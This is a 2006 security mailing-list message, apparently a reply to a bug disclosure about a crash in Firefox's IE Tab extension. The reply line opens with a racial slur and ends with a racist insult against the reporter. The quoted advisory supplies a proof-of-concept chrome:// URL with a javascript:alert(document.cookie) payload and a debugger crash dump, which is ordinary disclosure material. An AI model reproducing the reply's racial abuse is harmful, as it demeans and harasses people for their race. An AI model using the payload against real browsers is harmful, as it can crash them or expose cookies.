Message-ID: <631ac1d90605172225lb314a6bvc086082cea939eac@mail.gmail.com>
Date: Thu May 18 06:25:31 2006
From: perfect.material at gmail.com (PERFECT.MATERIAL)
Subject: Firefox (with IETab Plugin) Null Pointer Dereferences Bug

Dear Tan Colored Niggerish Guy,

This is not the right list for Mozilla extension bug reports. This list is
for security stuff only guy :)

PERFECT.MATERIAL

P.S. Your race smells bad you worthless idiot!

On 5/17/06, Debasis Mohanty <debasis.mohanty.listmails@...il.com> wrote:
>
> Firefox (with IETab Plugin) Null Pointer Dereferences Bug
> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> Vendor: Mozilla
> Product: FireFox with IE Tab
>
> Bugzilla ID: 14151 (http://bugzilla.mozdev.org/show_bug.cgi?id=14151)
> (Initially I incorrectly logged the bug under the wrong product;
> thanks to Dan Veditz for logging it under the appropriate product on
> my behalf).
>
> Tested On:
> FireFox Version 1.5.0.3 + IE Tab Version 1.0.9 + Windows (XP / 2K)
>
> Introduction:
> IETab (https://addons.mozilla.org/firefox/1419/) is a recently
> released (April 12, 2006) plugin for Firefox. It is used to browse IE
> (only) specific sites under Firefox. Guess what ?? You can run
> windowsupdate under FireFox
> ;-)
>
> Bug Details:
> Firefox with the IETab installed crashes when ietab plugin is unable
> to handle specific javascripts. It seems to be a null pointer
> dereference bug.
> For more details refer to the PoC section.
>
> Proof-of-Concept:
> Copy & paste the following URL to the Firefox addressbar and press enter -
>
> chrome://ietab/content/reloaded.html?url=javascript:alert(document.cookie);
>
> Note: This test will not work if IETab is not installed.
>
> The register details after the crash:
>
> (1e4.3e0): Access violation - code c0000005 (first chance)
> First chance exceptions are reported before any exception handling.
> This exception may be expected and handled.
> eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b edi=00000000
> eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po nc
> cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246
> npietab!NP_GetEntryPoints+0xb8ac:
> 0192e7dc 668b10           mov     dx,[eax]         ds:0023:00000000=????
> 0:000> g
> (1e4.3e0): Access violation - code c0000005 (!!! second chance !!!)
> eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b edi=00000000
> eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po nc
> cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000246
> npietab!NP_GetEntryPoints+0xb8ac:
> 0192e7dc 668b10           mov     dx,[eax]         ds:0023:00000000=????
>
>
>
> For more vulnerabilities :
> http://hackingspirits.com/vuln-rnd/vuln-rnd.html
>
>
> Credits:
> Debasis Mohanty (aka Tr0y)
> www.hackingspirits.com